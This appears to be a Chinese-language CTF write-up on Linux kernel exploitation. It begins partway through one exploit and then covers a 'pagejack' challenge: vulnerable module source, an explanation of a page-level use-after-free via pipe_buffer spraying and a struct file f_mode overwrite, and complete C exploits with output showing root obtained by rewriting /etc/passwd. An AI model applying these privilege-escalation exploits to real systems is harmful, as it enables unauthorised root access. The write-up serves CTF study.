    const void *ops;
    unsigned int flags;
    unsigned long private;
};

#define PIPE_BUF_FLAG_CAN_MERGE 0x10

int main(){

    fd = open("/dev/vuln", O_RDONLY);
    if (fd == -1){
        puts("Open /dev/vuln failed");
        exit(0);
    }

    etcpasswd_fd = open("/etc/passwd", O_RDONLY);
    if (etcpasswd_fd == -1) {
        puts("Open /etc/passwd failed");
        exit(0);
    }

    obj_alloc();
    obj_free();

    int pipefd[2];

    // create pipe let pipe buffer have UAF
    pipe(pipefd);

    /*
           ssize_t splice(int fd_in, off_t *_Nullable off_in,
                      int fd_out, off_t *_Nullable off_out,
                      size_t size, unsigned int flags);
    */
    off64_t offset = 0;
    splice(etcpasswd_fd, &offset, pipefd[1],  NULL, 1, 0);
    
    struct pipe_buffer my_evil_pipe_buffer;
    obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);

    printf(
        "[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n", 
        my_evil_pipe_buffer.page,
        my_evil_pipe_buffer.offset,
        my_evil_pipe_buffer.len,
        my_evil_pipe_buffer.ops,
        my_evil_pipe_buffer.flags,
        my_evil_pipe_buffer.private
    );

    /*
    Overwrite flags and len
    */
    my_evil_pipe_buffer.len = 0;
    my_evil_pipe_buffer.flags = PIPE_BUF_FLAG_CAN_MERGE;

    obj_write(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);

    obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);
    printf(
        "[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n", 
        my_evil_pipe_buffer.page,
        my_evil_pipe_buffer.offset,
        my_evil_pipe_buffer.len,
        my_evil_pipe_buffer.ops,
        my_evil_pipe_buffer.flags,
        my_evil_pipe_buffer.private
    );

    char payload[] = "root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh";
    int ret = write(pipefd[1], payload, sizeof(payload));
    if (ret == -1) {
        puts("Failed to write /etc/passwd");
        exit(0);
    }

    return 0;
}

/*
~ $ id
uid=1000(ctf) gid=1000 groups=1000
~ $ ./exploit 
[+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0x1, .ops = 0xffffffff8f215320, .flags = 0, .private = 0
[+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0, .ops = 0xffffffff8f215320, .flags = 0x10, .private = 0
~ $ cat /etc/passwd
root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh:/home/ctf:/bin/sh
~ $ su
Password: 
/ # id
uid=0(root) gid=0(root) groups=0(root)
*/

pagejack

obj 是 0x400 大小 (用 kmalloc-1024)
這題提供兩個 ioctl
一個可以分配 chunk
一個可以去對 obj 做寫入

size 輸入完後會在最後補上 null
這是一個越界的 off by null

#include <linux/fs.h>
#include <linux/miscdevice.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/uaccess.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("r1ru");

#define CMD_ALLOC   0xf000
#define CMD_WRITE   0xf001

#define OBJ_SIZE    0x400

typedef struct {
    size_t size;
    char *data;
} request_t;

struct obj {
    char buf[OBJ_SIZE];
};

static struct obj *obj = NULL;
static DEFINE_MUTEX(module_lock);

static long obj_alloc(void) {
    if (obj != NULL) {
        return -1;
    }
    obj = kzalloc(sizeof(struct obj), GFP_KERNEL);
    if (obj == NULL) {
        return -1;
    }
    return 0;
}

static long obj_write(char *data, size_t size) {
    if (obj == NULL || size > OBJ_SIZE) {
        return -1;
    }
    if (copy_from_user(obj->buf, data, size) != 0) {
        return -1;
    }
    obj->buf[size] = '\0';
    return 0;
}

static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    request_t req;
    long ret;
    if (copy_from_user(&req, (void *)arg, sizeof(req)) != 0) {
        return -1;
    }
    mutex_lock(&module_lock);
    switch(cmd) {
        case CMD_ALLOC:
            ret = obj_alloc();
            break;
        case CMD_WRITE:
            ret = obj_write(req.data, req.size);
            break;
        default:
            ret = -1;
            break;
    }
    mutex_unlock(&module_lock);
    return ret;
}

static struct file_operations module_fops = {
    .unlocked_ioctl = module_ioctl,
};

static struct miscdevice vuln_dev = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "vuln",
    .fops = &module_fops
};

static int __init module_initialize(void) {
    if (misc_register(&vuln_dev) != 0) {
        return -1;
    }
    return 0;
}

static void __exit module_cleanup(void) {
    misc_deregister(&vuln_dev);
    mutex_destroy(&module_lock);
}

module_init(module_initialize);
module_exit(module_cleanup);

pagejack

pipe 相關資料可以參考這個
https://hackmd.io/@naup96321/HkS86zu_ex

pagejack 目標是放在 pipe_buffer array
pipe_inode_info 是 pipe 的 metadata
pipe_buffer 則是實際存放 pipe 資料的地方
一個 pipe_buffer 會指向一個 page 負責管理

// 

/**
 *	struct pipe_inode_info - a linux kernel pipe
 *	@mutex: mutex protecting the whole thing
 *	@rd_wait: reader wait point in case of empty pipe
 *	@wr_wait: writer wait point in case of full pipe
 *	@head: The point of buffer production
 *	@tail: The point of buffer consumption
 *	@head_tail: unsigned long union of @head and @tail
 *	@note_loss: The next read() should insert a data-lost message
 *	@max_usage: The maximum number of slots that may be used in the ring
 *	@ring_size: total number of buffers (should be a power of 2)
 *	@nr_accounted: The amount this pipe accounts for in user->pipe_bufs
 *	@tmp_page: cached released page
 *	@readers: number of current readers of this pipe
 *	@writers: number of current writers of this pipe
 *	@files: number of struct file referring this pipe (protected by ->i_lock)
 *	@r_counter: reader counter
 *	@w_counter: writer counter
 *	@poll_usage: is this pipe used for epoll, which has crazy wakeups?
 *	@fasync_readers: reader side fasync
 *	@fasync_writers: writer side fasync
 *	@bufs: the circular array of pipe buffers
 *	@user: the user who created this pipe
 *	@watch_queue: If this pipe is a watch_queue, this is the stuff for that
 **/
struct pipe_inode_info {
	struct mutex mutex;
	wait_queue_head_t rd_wait, wr_wait;

	/* This has to match the 'union pipe_index' above */
	union {
		unsigned long head_tail;
		struct {
			pipe_index_t head;
			pipe_index_t tail;
		};
	};

	unsigned int max_usage;
	unsigned int ring_size;
	unsigned int nr_accounted;
	unsigned int readers;
	unsigned int writers;
	unsigned int files;
	unsigned int r_counter;
	unsigned int w_counter;
	bool poll_usage;
#ifdef CONFIG_WATCH_QUEUE
	bool note_loss;
#endif
	struct page *tmp_page[2];
	struct fasync_struct *fasync_readers;
	struct fasync_struct *fasync_writers;
	struct pipe_buffer *bufs;
	struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
	struct watch_queue *watch_queue;
#endif
};

pipe_buffer 裡面有 page pointer
如果能讓 page pointer 指向到同一張 page，就可以有 page level UAF (剛好 page_buffer 第一個元素是 page pointer，只需要有 off by one 或 off by null 就可以成功去作出 page level UAF)

// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L17

/**
 *	struct pipe_buffer - a linux kernel pipe buffer
 *	@page: the page containing the data for the pipe buffer
 *	@offset: offset of data inside the @page
 *	@len: length of data inside the @page
 *	@ops: operations associated with this buffer. See @pipe_buf_operations.
 *	@flags: pipe buffer flags. See above.
 *	@private: private data owned by the ops.
 **/
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

attack

首先先 spray 一段 pipe_buffer
接下來 allocate 一個 victim object
之後再去 spray 一段 pipe_buffer
保證了 pipe_buffer 之中有一個可以用來做 overflow 的 obj

這邊稍微注意一下，因為我們不知道實際蓋到的 pipe 是哪一個
因此需要做一點標記
可以在每個 pipe_buffer 上寫入資訊，並每個都 +1
首先塞入 4 個作為識別
後面塞入一些垃圾做為 padding (8 bytes)，不要讓 pipe_buffer 再讀取用於識別的 bytes 後，不會被 free 掉

為甚麼是 padding 4 + 8 bytes 呢? 原因是可以看到 struct file
當我們打開 file 後會自動分配一個 struct file
我們目標是將 /etc/passwd 改寫
而 /etc/passwd 本身是不可寫的，但如果能將 f_mode 改成可寫，就可以往檔案寫入東西
f_mode offset = 12
如果填入 12 bytes，下次寫入就可以直接寫
https://elixir.bootlin.com/linux/v6.13.12/source/include/linux/fs.h#L1035

struct file {
	file_ref_t			f_ref;
	spinlock_t			f_lock;
	fmode_t				f_mode;
	const struct file_operations	*f_op;

現在排好了 slub 布局以及 obj 後
就可以通過 off by null 去覆蓋掉 page pointer
接下來通過 read 來去看哪一個 pipe_buffer 現在不屬於原本的 page
去找到被改寫的 page 所屬的 pipe_buffer 後，以及現在被指向的 page 後 pipe_buffer
我們去釋放掉被指向的 pipe_buffer
這樣就有一個 page level 的 UAF 了 (struct page pointer)

接下來就去 spray /etc/passwd 的 file 結構體，讓 UAF 的 page 被拿走
然後去通過 write 對改寫的 page 做寫入，把 f_mode 寫成可寫
可以參考
https://elixir.bootlin.com/linux/v6.13.12/source/include/linux/fs.h#L116

/* file is open for reading */
#define FMODE_READ		((__force fmode_t)(1 << 0))
/* file is open for writing */
#define FMODE_WRITE		((__force fmode_t)(1 << 1))

把他改寫為可以 write 後

就可以將 /etc/passwd 寫掉來提權了

PS: 當然實際上有可能發生我們 overlapping 的 page 是我們無法控制的，但在雜訊較低的環境中比較不容易發生，並且該覆蓋的記憶體與控制的 page 很相近，實際上非常有機會蓋到可控 page

我也有參考這個
https://ctf-wiki.org/pwn/linux/kernel-mode/exploitation/heap/buddy/page-uaf/#stepii-fcntlf_setpipe_sz-pipe_buffer-slub-uaf

最後稍微附註一下 slub 布局(kmalloc-1k)
通過 slub-dump 觀察到 (附註一下我這邊 Demo 為了識別方便改 padding 0x87)

可以觀察到通過 null byte 會 overwrite 低位
讓兩個 pipe_buffer 的 struct page pointer 指向同一塊

至於為甚麼 kmalloc-1k 沒有 Red zone 之類的我還沒研究
先放著

exploit

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <assert.h>
#include <stdint.h>
#include <sched.h>
#include <unistd.h>
#include <sys/mman.h> 

// gcc exploit.c -o exploit --static

#define CMD_ALLOC   0xf000
#define CMD_WRITE   0xf001

typedef struct {
    size_t size;
    char *data;
} request_t;

int fd;

void obj_alloc() {
    request_t req = {};
    int ret = ioctl(fd, CMD_ALLOC, &req);
    if (ret != 0) {
        puts("[x] obj alloc failed");
        exit(0);
    }
}

void obj_write(size_t size, char* data) {
    request_t req = {
        .size = size,
        .data = data
    };
    int ret = ioctl(fd, CMD_WRITE, &req);
    if (ret != 0) {
        puts("[x] obj write failed");
        exit(0);        
    }
}


#define NUM_PIPE_SPRAY 0x20
#define NUM_PIPE_SPRAY_HALF 0x10
#define NUM_FILE_SPRAY 0x100

int main(){

    int fd_pipe[NUM_PIPE_SPRAY][2];

    fd = open("/dev/vuln", O_RDONLY);
    if (fd == -1){
        puts("[x] Open /dev/vuln failed");
        exit(0);
    }

    for (int i = 0; i < NUM_PIPE_SPRAY_HALF; i++){
        int ret = pipe(fd_pipe[i]);
        if (ret == -1) {
            puts("[x] spray pipe part 1 failed");
            exit(0);
        }

        int val = 0xaabbccdd + i;
        int ret1 = write(fd_pipe[i][1], &val, sizeof(val));
        int ret2 = write(fd_pipe[i][1], "22334455", 8);
        if (ret1 == -1 || ret2 == -1) {
            puts("[x] error to write data");
            exit(0);
        }

    }

    obj_alloc();

    for (int i = NUM_PIPE_SPRAY_HALF; i < NUM_PIPE_SPRAY; i++){
        int ret = pipe(fd_pipe[i]);
        if (ret == -1) {
            puts("[x] spray pipe part 2 failed");
            exit(0);
        }

        int val = 0xaabbccdd + i;
        int ret1 = write(fd_pipe[i][1], &val, sizeof(val));
        int ret2 = write(fd_pipe[i][1], "22334455", 8);
        if (ret1 == -1 || ret2 == -1) {
            puts("[x] error to write data");
            exit(0);
        }

    }

    puts("[!] Success prepare victim obj and pipe buffer");


    char payload_400h[0x400];
    memset(payload_400h, 0, sizeof(payload_400h));

    obj_write(0x400, payload_400h);
    puts("Success to use off by null, and overwrite pipe buffer page");

    int origin_pipe_fd, overlapping_pipe_fd;
    int find = 0;

    for (int i = 0; i < NUM_PIPE_SPRAY; i++) {
        int val = 0,  ret = read(fd_pipe[i][0], &val, 4);
        if (ret == -1) {
            puts("[x] Error to read data from pipe");
            exit(0);
        }

        if (val != 0xaabbccdd + i) {
            overlapping_pipe_fd = i;
            origin_pipe_fd = val - 0xaabbccdd;
            puts("[!] Detect UAF!");
            printf("[!] UAF happend on %d\n", overlapping_pipe_fd);
            printf("[!] page origin from %d\n", origin_pipe_fd);
            find = 1;
        }
    }

    if (find == 0) {
        puts("[x] Error to make UAF");
        exit(0);
    }

    puts("[!] Free origin fd make page level UAF");
    close(fd_pipe[origin_pipe_fd][0]);
    close(fd_pipe[origin_pipe_fd][1]);

    int etcpasswd_fd[NUM_FILE_SPRAY];
    for (int i = 0; i < NUM_FILE_SPRAY; i++) {
        etcpasswd_fd[i] = open("/etc/passwd", O_RDONLY);
        if (etcpasswd_fd[i] == -1) {
            puts("[x] Spray etc passwd failed");
            exit(0);
        }
    }

    puts("[!] Success to spray etc passwd");
    int fake_f_mode = 0x84f801f;
    int ret = write(fd_pipe[overlapping_pipe_fd][1], &fake_f_mode, 4);
    if (ret == -1) {
        puts("[x] Failed to write etc passwd");
        exit(0);
    }

    char payload_fake_root[] = "root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh";
    for (int i = 0; i < NUM_FILE_SPRAY; i++) {
        int ret = 0;
        ret = write(etcpasswd_fd[i], payload_fake_root, sizeof(payload_fake_root));
        if (ret == -1) {
            printf("Failed to write /etc/passwd: fd = %d\n", i);
        } else {
            puts("Success to write /etc/passwd");
            break;
        }
    }

    return 0;
}

/*
~ $ ./exploit 
[!] Success prepare victim obj and pipe buffer
Success to use off by null, and overwrite pipe buffer page
[!] Detect UAF!
[!] UAF happend on 16
[!] page origin from 19
[!] Free origin fd make page level UAF
[!] Success to spray etc passwd
Failed to write /etc/passwd: fd = 0
Failed to write /etc/passwd: fd = 1
Failed to write /etc/passwd: fd = 2
Failed to write /etc/passwd: fd = 3
Failed to write /etc/passwd: fd = 4
Success to write /etc/passwd
~ $ cat /etc/passwd
root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh:/home/ctf:/bin/sh
~ $ su
Password: 
/ # cat /dev/sdb
flag{PageJack}
*/